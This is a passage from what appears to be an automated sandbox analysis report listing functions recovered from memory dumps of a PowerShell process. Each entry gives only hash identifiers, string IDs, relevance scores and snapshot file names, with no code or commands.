                                                        • Opcode Fuzzy Hash: 165ce7306e34849b1ca43327abf67c27fb6b9ca481bd4d1062d12a6384b01b63
                                                        • Instruction Fuzzy Hash: 7B1247B17242078FCB249B69C8506BBFBE6EF85210F18847ADA05DB391DB35DD41C7A2
                                                        Function 072F29F0 Relevance: 18.2, Strings: 14, Instructions: 654COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-345548902
                                                        • Opcode ID: 6ac28d30dceba7be7d6597cc8b9a9ebfd001938a04895aabffe11458fe7c3308
                                                        • Instruction ID: 744527271cdae3fd23f4dfb864b7817386e0cd8ff1e33877284f8262227568df
                                                        • Opcode Fuzzy Hash: 6ac28d30dceba7be7d6597cc8b9a9ebfd001938a04895aabffe11458fe7c3308
                                                        • Instruction Fuzzy Hash: 99221571625346CFC7258B68C8106AAFFE6FF87210F2884BBD944DB292DA35CD45C7A1
                                                        Function 072F6C60 Relevance: 15.8, Strings: 12, Instructions: 806COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                        • API String ID: 0-2265583125
                                                        • Opcode ID: 4c5c4f80479431b3e6c4e664b567a83e1ab99d77d4e2a1dc331659e9c5131e0b
                                                        • Instruction ID: a925e0e7ed8eabde108d36f96a0d54774f7e6086d65bbc6cdd7b0a4f1a83a005
                                                        • Opcode Fuzzy Hash: 4c5c4f80479431b3e6c4e664b567a83e1ab99d77d4e2a1dc331659e9c5131e0b
                                                        • Instruction Fuzzy Hash: A16281B0A102198FDB24DF68C951B9AFBB2EF88304F10C1A9D605AF395CB75DD45CB91
                                                        Function 072F78CB Relevance: 4.2, Strings: 3, Instructions: 459COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq
                                                        • API String ID: 0-3078559419
                                                        • Opcode ID: eda7f603b94bf3f98d54c807102bbbffe77c5fe676b10b44cbef1a5b0bc52159
                                                        • Instruction ID: a9cbbc86bc81e6fc54f35ad5aad380d68a1098597e3de859c8607a0e28cf6c19
                                                        • Opcode Fuzzy Hash: eda7f603b94bf3f98d54c807102bbbffe77c5fe676b10b44cbef1a5b0bc52159
                                                        • Instruction Fuzzy Hash: 051291B0A102059FCB14CF58C951BAAFBB2EF88304F54C1A9DA05AF395CB76DD42CB91
                                                        Function 044EB480 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hnq$$jq$$jq
                                                        • API String ID: 0-266315406
                                                        • Opcode ID: 850e1df51b231a9c4ea8211865744d893eb8d0047cf275cb13f99fc2377992c2
                                                        • Instruction ID: f902845a3a5bf6f4d6598ac57e99b6645d4016c4d22665e9c495acd9367d947d
                                                        • Opcode Fuzzy Hash: 850e1df51b231a9c4ea8211865744d893eb8d0047cf275cb13f99fc2377992c2
                                                        • Instruction Fuzzy Hash: C0123E30B011588FDB25DF25D995AAEB7B2FF89305F1440A9D50AAB361DF35AE81CF80
                                                        Function 072F8BA0 Relevance: 4.0, Strings: 3, Instructions: 293COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$$jq
                                                        • API String ID: 0-1113016419
                                                        • Opcode ID: cb53634c382456a2e7ae74f76e6030523fc0428e29457e87329d39e63a618bba
                                                        • Instruction ID: 2d94206eca04b8e2d43db306baca94a4390143fb23d02253f802a525a5d96899
                                                        • Opcode Fuzzy Hash: cb53634c382456a2e7ae74f76e6030523fc0428e29457e87329d39e63a618bba
                                                        • Instruction Fuzzy Hash: 53A13AB17253468FCB259B78C92176AFBA29F86300F1484BBD601DF2A2DA35CD45C7A1
                                                        Function 072F0A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq
                                                        • API String ID: 0-3696375380
                                                        • Opcode ID: c9b9418566d4abc5152ebccf9324935e73ed2247cf1e1e660cfff853d35f5722
                                                        • Instruction ID: 0549e4ad89f572d872edc3c8de1ab868136564575d6e91113e1724bf180c8160
                                                        • Opcode Fuzzy Hash: c9b9418566d4abc5152ebccf9324935e73ed2247cf1e1e660cfff853d35f5722
                                                        • Instruction Fuzzy Hash: 954118B2B202169FCB349AB9C9406AFF7A5EFC5214B14853ACA05EB242DA31DD01C7E1
                                                        Function 072F51B0 Relevance: 3.5, Strings: 2, Instructions: 971COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq
                                                        • API String ID: 0-1204115232
                                                        • Opcode ID: d9402aa7c6962383f32034613f4c0c960cdc2d55e27e8f94e4df7f4e0ddf3bf5
                                                        • Instruction ID: 51af9fae950e03f24e5336860205de5dcf904c6cf6adcee7b8df5f59d151ae05
                                                        • Opcode Fuzzy Hash: d9402aa7c6962383f32034613f4c0c960cdc2d55e27e8f94e4df7f4e0ddf3bf5
                                                        • Instruction Fuzzy Hash: C4926BB4A10215CFD724DB58C994B6AFBB2FB89304F14C0A9DA09AB355CB72DD81CF91
                                                        Function 072F72DB Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq
                                                        • API String ID: 0-1204115232
                                                        • Opcode ID: 6d5be67edb25a5126038b1b478c2143b3b8b6465b188cf55a941834ea4aae0a7
                                                        • Instruction ID: f32263bce9120391f960784b03e0a5f641b9f5c854ad5ace311612b04b94ef5d
                                                        • Opcode Fuzzy Hash: 6d5be67edb25a5126038b1b478c2143b3b8b6465b188cf55a941834ea4aae0a7
                                                        • Instruction Fuzzy Hash: 2CF1C5B0A102159FD724DB68CA51BAABBB7EF88304F1084A5D609AF391CB759D41CB91
                                                        Function 072FA3C8 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq
                                                        • API String ID: 0-1204115232
                                                        • Opcode ID: a553040334602f25abbe10878329b523d150c43a57ff2eed64f15c5a51122972
                                                        • Instruction ID: 6ed10e1904d0379c225b14415c4da35cf9c5ee0ac434c3ed607342f807fc2a9f
                                                        • Opcode Fuzzy Hash: a553040334602f25abbe10878329b523d150c43a57ff2eed64f15c5a51122972
                                                        • Instruction Fuzzy Hash: FDA12AB1B20212CFCB259BB8851166AFBB29F86714F14C47ACA09DF251DB35DD41C7A2
                                                        Function 072F0A60 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq
                                                        • API String ID: 0-3720491408
                                                        • Opcode ID: 68f540a10949bfba2680d61710294b056d9fefc2323d34f7596fa93df3ca16d2
                                                        • Instruction ID: 385e30e50e5bcdbd8f27ff128213ff605495562402d361eb40cd340b250d850a
                                                        • Opcode Fuzzy Hash: 68f540a10949bfba2680d61710294b056d9fefc2323d34f7596fa93df3ca16d2
                                                        • Instruction Fuzzy Hash: 7C2128B69253569FCB319F65C9502AAFFB0BF4621072981B7DE04EB243D2308D44C7A1
                                                        Function 072F5193 Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq
                                                        • API String ID: 0-3676250632
                                                        • Opcode ID: 3b24ac40cce0a701181eb90d614bf1943a419939358fc3344d6f7fd3ce8f89ce
                                                        • Instruction ID: 530f062b7a690de07e8282c3fa47dd68a59019f3e9989903611f6f16d5963602
                                                        • Opcode Fuzzy Hash: 3b24ac40cce0a701181eb90d614bf1943a419939358fc3344d6f7fd3ce8f89ce
                                                        • Instruction Fuzzy Hash: F9725DB4A10215DFD724CB18C984B5AFBB2FB89314F14C1A9DA09AB356CB72DD81CF90
                                                        Function 072F5DB2 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq
                                                        • API String ID: 0-3676250632
                                                        • Opcode ID: ea61e6987276b24fa1642c3dcc4693d60cafe97aa1554691991ec8a3772f7d39
                                                        • Instruction ID: dfe7b251261ee825595ee89c6c3b5fdfd9f2d31a560be8caa956e2c9e30b2197
                                                        • Opcode Fuzzy Hash: ea61e6987276b24fa1642c3dcc4693d60cafe97aa1554691991ec8a3772f7d39
                                                        • Instruction Fuzzy Hash: FA225EB4A20215DFD724CB18C981BA9FBB2FB85714F14C0A9D609AB352CB72DD85CF91
                                                        Function 072F8B9E Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq
                                                        • API String ID: 0-3676250632
                                                        • Opcode ID: a8279bf594f16c7786b5d4ff14dc4af3b68e9d5192a116a99b7ab2db8c74dee3
                                                        • Instruction ID: f9caef7e8116207cbcf8d652217a937aaaf283b3e7446e17c5abeb3bebbc3839
                                                        • Opcode Fuzzy Hash: a8279bf594f16c7786b5d4ff14dc4af3b68e9d5192a116a99b7ab2db8c74dee3
                                                        • Instruction Fuzzy Hash: E841E2F0B31303DFCB288E78C595A7AF7A2AF94204F148476DA00DB265DB32D941CBA1
                                                        Function 044E2F50 Relevance: .5, Instructions: 511COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21c6aadb2231fec65e43583b668af111671084c5012179129020d462192f22f9
                                                        • Instruction ID: 820388d0c41b7ca282bd2031390d6de055d8778573f65db367389bdd91147413
                                                        • Opcode Fuzzy Hash: 21c6aadb2231fec65e43583b668af111671084c5012179129020d462192f22f9
                                                        • Instruction Fuzzy Hash: 7B222A74A00209DFCB16CF99D584AAEFBB2FF48311F24855AE815AB365C731ED81CB90
                                                        Function 044EEB64 Relevance: .3, Instructions: 277COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de109ada1e5c3cd6f53394f84dce81d0d0e9592e3b4a59de621a1183153a84fc
                                                        • Instruction ID: e79fd2a1ce596593853f470ac840d86b65b10bdc4b7b3f949800aa31cddc3cb2
                                                        • Opcode Fuzzy Hash: de109ada1e5c3cd6f53394f84dce81d0d0e9592e3b4a59de621a1183153a84fc
                                                        • Instruction Fuzzy Hash: 95B15E70E00209DFEF10CFAAC9857AEBBF1EF48305F24852AD414A7354EB75A845CB95
                                                        Function 044EF435 Relevance: .3, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f43fff7c44b115ebed24268006d562b0172bbb47286d625c0f06d6beda81f542
                                                        • Instruction ID: 85dd66531d89326b46e1efdbfb646a163aeabfc497657a3a1db4ca617050fbb5
                                                        • Opcode Fuzzy Hash: f43fff7c44b115ebed24268006d562b0172bbb47286d625c0f06d6beda81f542
                                                        • Instruction Fuzzy Hash: D6A17071E00209EFDF10CFAAD9857AEBBF1AF48315F14852AD814E7354EB74A849CB85
                                                        Function 044E8F7D Relevance: .3, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 554f014e01ac2ce6f8e362e58c7bb5a42cd699ae45146d191866ee3cdc76b2c9
                                                        • Instruction ID: 7a4a17560e4e47fe6084d9668a9ad2c294d7d8d7ddf2dc64e44a9b02ddd9fd30
                                                        • Opcode Fuzzy Hash: 554f014e01ac2ce6f8e362e58c7bb5a42cd699ae45146d191866ee3cdc76b2c9
                                                        • Instruction Fuzzy Hash: 47A16071A00248DFDF14DFA6D944AADBBB2FF88301F118559E402AF3A5DB34AD49CB40
                                                        Function 072F4E08 Relevance: .2, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8e69cf946b88e6cdbdaab7696280f4e5e12da12e04504d8e7347105525d21a2
                                                        • Instruction ID: 627d49f80fe593f74cc35e5e7fc0ef58d75acbb3eceec4af43f6abe669828147
                                                        • Opcode Fuzzy Hash: d8e69cf946b88e6cdbdaab7696280f4e5e12da12e04504d8e7347105525d21a2
                                                        • Instruction Fuzzy Hash: 5791B2B0B102059FC714DB58C645BAEBBE6EF89304F508468EA05AB395CF76ED41CBA1
                                                        Function 072F4DE8 Relevance: .2, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13ab5f1232ab0c2cb2a7c2d60077b3a857642667413625ab54b9dd9453aa69f5
                                                        • Instruction ID: 8155d6bcf3d0234a6a522fcd193f2f39d41cf595cfae4a9ff46ef9822f70afb0
                                                        • Opcode Fuzzy Hash: 13ab5f1232ab0c2cb2a7c2d60077b3a857642667413625ab54b9dd9453aa69f5
                                                        • Instruction Fuzzy Hash: 8F91C2B0A102059FD714DB58C681FAEBBF2EF89314F108569E905AF391CB76ED41CBA1
                                                        Function 044E8768 Relevance: .2, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1875540eaf6cf99435b29f1fa49d758e8a3dc4c264c82e0db01258d44ae9606b
                                                        • Instruction ID: 501bc2d995445bdfbbdd62bf96086b098a417f21ead9c687ff599d0eb4c81d31
                                                        • Opcode Fuzzy Hash: 1875540eaf6cf99435b29f1fa49d758e8a3dc4c264c82e0db01258d44ae9606b
                                                        • Instruction Fuzzy Hash: 2F717A34A052449FCF15DFA5D8849AEBBF2FF89305B1884AAE445AB361C735EC86CB50
                                                        Function 044E9836 Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ce040c05e9057194372ddc765acacd301d48a977691ff1ca10747992cfc638e
                                                        • Instruction ID: 8574989a283ab559dfc5e858a58ba494f58ad0949889cb31565ca2a844fcbcc3
                                                        • Opcode Fuzzy Hash: 2ce040c05e9057194372ddc765acacd301d48a977691ff1ca10747992cfc638e
                                                        • Instruction Fuzzy Hash: A0712A70A00648DFDF24DFB5D541AAEBBF6BF88305F14842AD412AB3A0DB75AD46CB41
                                                        Function 044EF1AC Relevance: .2, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e055cff5bf54d8b602d30df7f5607afb22be54a756dfa32ee056338f18e64fb
                                                        • Instruction ID: 82e6dfa7ca75807adcf6298c7610ead3718e9848d306229d6bf57e02e1fa8891
                                                        • Opcode Fuzzy Hash: 2e055cff5bf54d8b602d30df7f5607afb22be54a756dfa32ee056338f18e64fb
                                                        • Instruction Fuzzy Hash: C7717B71E00249EFDF10CFAAC8457EEFBF1AF88315F14812AE415A7254EB75A845CB91
                                                        Function 044EF1B8 Relevance: .2, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c709a729a7a8a4136825ac041cb2c4749c593d3d349a5797a752cb04a7674cb4
                                                        • Instruction ID: c49b5e8125e7aea34fae997dce0c105ab9f14283a782f6d530964fa1947cbe6f
                                                        • Opcode Fuzzy Hash: c709a729a7a8a4136825ac041cb2c4749c593d3d349a5797a752cb04a7674cb4
                                                        • Instruction Fuzzy Hash: EA716D71E00249EFDF10CFAAC9457AEFBF2AF88315F14812AD414A7354EB75A845CB91
                                                        Function 044E96CD Relevance: .2, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2804911ee08022480421bc3334f19e2451c4202e4b026d7bc560d411d3fd5268
                                                        • Instruction ID: dd9cf197033860c132b39338f6b8ce34eb0a3610a4ce27f5b8d9bfdf923e1202
                                                        • Opcode Fuzzy Hash: 2804911ee08022480421bc3334f19e2451c4202e4b026d7bc560d411d3fd5268
                                                        • Instruction Fuzzy Hash: CB516070A00609CFCB14DF69D980AAEBBF2FF84315F14852AD405AB7A5DB75AD46CF40
                                                        Function 072FA3AC Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f780f07097ee96b216cfbbd7b81a101ca399046b96647603b459bab1df91c2e0
                                                        • Instruction ID: f7e9beb80145d1dc58fea53e758cdca6c38d169b0648a0af75d745a63cc785a9
                                                        • Opcode Fuzzy Hash: f780f07097ee96b216cfbbd7b81a101ca399046b96647603b459bab1df91c2e0
                                                        • Instruction Fuzzy Hash: 824124F0E20203DFCB21DF64C55566ABBB2AB8A344F05C4B5DA08DF252D735D945C7A1
                                                        Function 044E3060 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70fd3d3079953c4b6537bb4c406c7901b884b6a06b0c0a4680ddc51eee3da496
                                                        • Instruction ID: e24bd7e950f73069938e3f264d167bb63caaeab6e08a03e65645067961923def
                                                        • Opcode Fuzzy Hash: 70fd3d3079953c4b6537bb4c406c7901b884b6a06b0c0a4680ddc51eee3da496
                                                        • Instruction Fuzzy Hash: 2E410874A00605DFCB06CF59C5949BAFBB1FF48311B2585AAD915AB364C732FC90CBA4
                                                        Function 044E9470 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7dacfecdccb3a061ee3d950dc7088a0747646ac0ca865a8b7b742a2552c64ab4
                                                        • Instruction ID: 44813d62d9f0a4ba7e8e70ec16f79475133abe7cdcd8b74f57eab8bf51f7fbbb
                                                        • Opcode Fuzzy Hash: 7dacfecdccb3a061ee3d950dc7088a0747646ac0ca865a8b7b742a2552c64ab4
                                                        • Instruction Fuzzy Hash: D5415971B00604DFDB18DF36C958ABEBBB6AF88751F144469E406EB7A1CB35AC41CB50
                                                        Function 072F80D6 Relevance: .1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39090f5e92ce7e1237e73ed1ecdafd48e0f80658a75817c696c33f1be6dd0dbc
                                                        • Instruction ID: cee327f29dd9f3c21fd005dd4a78f9f5069cee117f535b0e6d59b6a1d9c01115
                                                        • Opcode Fuzzy Hash: 39090f5e92ce7e1237e73ed1ecdafd48e0f80658a75817c696c33f1be6dd0dbc
                                                        • Instruction Fuzzy Hash: C831B2B0B50204AFDB149768C955BAFBEA7EF88744F10C424E9016F391CE7A9C42CBE1
                                                        Function 044E9459 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abb5c774dcbe15f19e39f805b374cd391018d22c7d243c4143018e5e96688e43
                                                        • Instruction ID: 8e1217e2f5beb721d4060518b92aca71b5a783736d9dc9515e09998ba7157ce2
                                                        • Opcode Fuzzy Hash: abb5c774dcbe15f19e39f805b374cd391018d22c7d243c4143018e5e96688e43
                                                        • Instruction Fuzzy Hash: 7B416971B00600CFCB14CF76C958ABE7BB6AF89751F18446AD406EB7A1CB35AC45CB50
                                                        Function 072F0E18 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31654a4cfcfce6c4cf5bba9f3216489c83e8965129af810fe1eccf37632f31b4
                                                        • Instruction ID: 8745d1b139830c8347ba46093de56a1a758547df260925868f0b6c8fcbe22c99
                                                        • Opcode Fuzzy Hash: 31654a4cfcfce6c4cf5bba9f3216489c83e8965129af810fe1eccf37632f31b4
                                                        • Instruction Fuzzy Hash: CD216EB132435A9BD7345ABA884073BFAD6AFC5715F24843AE606DB3C2DD75D940C360
                                                        Function 044EC138 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce2e16129cfaf354eeef0b14d038c3b8ebc5e83d08cff424c822ac3380455694
                                                        • Instruction ID: be62f2b812c17638101d3c058fce65f37ac6c1cce89572954e47f8b5867e8b12
                                                        • Opcode Fuzzy Hash: ce2e16129cfaf354eeef0b14d038c3b8ebc5e83d08cff424c822ac3380455694
